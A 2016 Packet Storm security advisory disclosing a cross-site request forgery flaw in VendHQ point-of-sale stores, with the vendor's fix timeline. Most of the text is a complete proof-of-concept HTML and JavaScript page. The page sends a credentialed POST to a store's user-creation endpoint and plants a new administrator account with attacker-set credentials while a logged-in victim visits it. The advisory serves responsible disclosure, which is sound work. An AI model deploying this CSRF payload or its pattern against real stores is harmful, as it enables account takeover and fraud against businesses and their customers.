VendHQ Cross Site Request Forgery

2016-10-14T00:00:00
ID PACKETSTORM:139174
Type packetstorm
Reporter Ahsan Tahir
Modified 2016-10-14T00:00:00

Description

                                        
                                            `# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+  
# | ___ _ _____ _ _ |  
# | / _ \| | |_ _| | | (_) |  
# | / /_\ \ |__ ___ __ _ _ __ | | __ _| |__ _ _ __ |  
# | | _ | '_ \/ __|/ _` | '_ \ | |/ _` | '_ \| | '__| |  
# | | | | | | | \__ \ (_| | | | | | | (_| | | | | | | |  
# | \_| |_/_| |_|___/\__,_|_| |_| \_/\__,_|_| |_|_|_| |  
# | // Breaking Security Since Born! |  
# | |   
# | [-] Website: https://ahsantahir.py |  
# | [-] Email: support@ahsantahir.py |  
# | |  
# +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=+  
  
###  
# Title : VendHQ Add-admin CSRF Vulnerability [Full-Store Takeover]  
# Author : Ahsan Tahir  
# E-mail : mrahsan1337@gmail.com / support@ahsantahir.py  
# Web Site : www.ahsantahir.py  
# Facebook: http://fb.me/ahsantahiratofficial  
# Twitter : @AhsanTahirAT  
# Tested on : Kali Linux 2.0, Windows 8.1  
# Vendor : https://www.vendhq.com  
###  
  
Release Date:  
=============  
2016-10-14  
  
  
Product & Service Introduction:  
===============================  
Vend is retail POS software, inventory management, ecommerce & customer loyalty   
for iPad, Mac and PC. Easily manage & grow your business in the cloud.  
  
  
Abstract Advisory Information:  
==============================  
Ahsan Tahir, an independent vulnerability researcher discovered an add-admin CSRF vulnerability, which  
could lead to full store-takeover of any VendHQ store!  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2016-07-20: Found the vulnerability.  
2016-07-20: Reported to vendor.  
2016-07-22: Vendor Replied.  
2016-07-22: Vendor Fixed the vulnerability.  
2016-07-31: Vendor rewarded the researcher.  
2016-10-14: Public Disclosure  
  
Discovery Status:  
=================  
Published  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A Cross-Site Request Forgery vulnerability has been discovered in VendHQ stores.  
This allows remote attackers to craft a HTML Form, which requests a new admin on vendhq stores, when  
run by a victim, while he/she is logged in, and if the victim visits a page, his/her  
store will be HACKED/Pwn3d!   
  
Proof of Concept (PoC):  
=======================  
This vulnerability can be exploited by an attacker if he/she injects this code in his webpage, which   
they want their victim to visit!  
  
<html>  
<body>  
<script>  
function submitRequest()  
{  
var xhr = new XMLHttpRequest();  
xhr.open("POST", "https://<your-store>.vendhq.com/user/create", true);  
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30540262821640");  
xhr.withCredentials = true;  
var body = "-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][id]\"\r\n" +   
"\r\n" +   
"\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[id]\"\r\n" +   
"\r\n" +   
"\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[name]\"\r\n" +   
"\r\n" +   
"Hacked\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[display_name]\"\r\n" +   
"\r\n" +   
"A cashier\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[email]\"\r\n" +   
"\r\n" +   
"ahsan@ahsan.com\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[password]\"\r\n" +   
"\r\n" +   
"TestingPassword1\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[password_again]\"\r\n" +   
"\r\n" +   
"TestingPassword1\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[group_id]\"\r\n" +   
"\r\n" +   
"5\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[outlet_id][]\"\r\n" +   
"\r\n" +   
"\r\n" +   
"-----------------------------30540262821640\r\n" +   
"Content-Disposition: form-data; name=\"vend_user[vend_image_user_new][image]\"; filename=\"\"\r\n" +   
"Content-Type: application/octet-stream\r\n" +   
"\r\n" +   
"\r\n" +   
"-----------------------------30540262821640--\r\n";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);   
xhr.send(new Blob([aBody]));  
}  
</script>  
<form action="#">  
<input type="button" value="Submit request" onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
While a victim is logged in to his/her vend store and visits a webpage with the above code   
injected, a new admin will be created in their store, with the name as "Hacked" and the Password is "TestPassword1"   
and email: ahsan@ahsan.com  
  
Credits & Authors:  
==================  
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]  
`